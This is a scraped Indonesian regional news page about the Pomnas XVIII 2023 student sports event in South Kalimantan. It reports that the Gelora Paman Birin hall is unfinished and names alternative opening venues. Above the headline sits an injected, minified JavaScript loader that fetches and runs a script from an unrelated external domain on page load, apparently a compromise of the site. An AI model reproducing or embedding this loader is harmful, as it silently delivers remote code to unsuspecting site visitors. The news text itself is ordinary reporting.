(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Gelora Belum Siap Pakai, Venue Alternatif Disiapkan untuk Pomnas 2023


KANALKALIMANTAN.COM, BANJARBARU – Gelaran Pekan Olahraga Nasional (Pomnas) XVIII 2023 Kalimantan Selatan sudah di depan mata, 12-22 November 2023.

Ajang olahraga multieven mahasiswa se Indonesia yang diselenggarakan setiap dua tahun, dimana Kalimantan Selatan sebagai tuan rumah.

Sebagai tuan rumah, Gedung Olahraga (Gelora) Paman Birin di kawasan perkantoran Pemprov Kalsel akan digunakan sebagai venue pembukaan Pomnas XVIII 2023.

Namun, Kepala Dinas Kepemudaan dan Olahraga Kalsel, Hermansyah memastikan penggunaan Gelora indoor untuk pembukaan Pomnas belum bisa terealisasi.

Baca juga: Kembali Pasokan Air Terhenti, Berikut Wilayah Terdampak di Banjarmasin

“Awalnya Gelora indoor dipersiapkan untuk pelaksanaan pembukaan Pomnas XVIII 2023.  Tapi hingga saat ini, masih dalam tahap proses pembangunan,” ungkap Hermansyah.

Ia menjelaskan proses pembangunan Gelora tersebut diperkirakan belum rampung hingga jadwal pembukaan even nasional antar mahasiswa Tanah Air itu berlangsung.

Pihaknya pun kembali menyiapkan sejumlah alternatif venue pembukaan agar kegiatan dapat berjalan dengan sukses.

Kepala Dinas Kepemudaan dan Olahraga Kalsel, Hermansyah. Foto: wanda

Baca juga: Karhutla Berkurang, Banjir Intai Wilayah Kalsel

“Alternatifnya ada tiga lokasi yaitu auditorium ULM Banjarbaru, GOR Hasanudin HM Banjarmasin, dan Stadion 17 Mei Banjarmasin,” sebut dia.

Sementara itu pihaknya juga telah berkoordinasi dengan Dinas PUPR Kalsel dan menyatakan Gelora belum bisa rampung hingga pembukaan Pomnas nanti.

Selanjutnya pihaknya juga segera melakukan pertemuan dengan Badan Pembina Olahraga Mahasiswa (Bapomi) Kalsel sebagai pelaksana kegiatan untuk menentukan tempat pembukaan Pomnas.

Menurutnya, proses penyelesaian tahap akhir pembangunan Gelora masih terkendala oleh kondisi cuaca yang saat ini sedang tidak menentu.

Baca juga: Komplotan Emak-emak Gasak Ratusan Baju Muslim di Banjarbaru, Terekam CCTV Dibekuk Polisi

“Akibat cuaca berdampak pada pengirim bahan bangunan yang akan digunakan sehingga tehambat karena menggunakan kapal laut,” ujarnya.

Selain itu, katanya, semua jenis rangka bangunan yang dipakai untuk membangun Gelora itu dirakit di luar daerah, sehingga juga membutuhkan waktu dalam pengiriman.

Untuk diketahui, pada even olahraga nasional ini diperkirakan tamu yang hadir mencapai 3000 peserta yang semuanya merupakan mahasiswa mahasiswi dari berbagai provinsi.

Baca juga: Tangkap Kelompok Remaja ‘Pasber 027’, Mapolresta Banjarmasin Dipenuhi Karangan Bunga

Meski berubah venue, Hermansyah mengatakan tak mempengaruhi seremoni pembukaan maupun pelaksaan kegiatan.

“Saya rasa tidak ada masalah soal pelaksanaan pembukaan,” pungkasnya. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor : bie


Risa

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

45 menit ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

2 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

3 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

4 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

7 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

8 jam ago

This website uses cookies.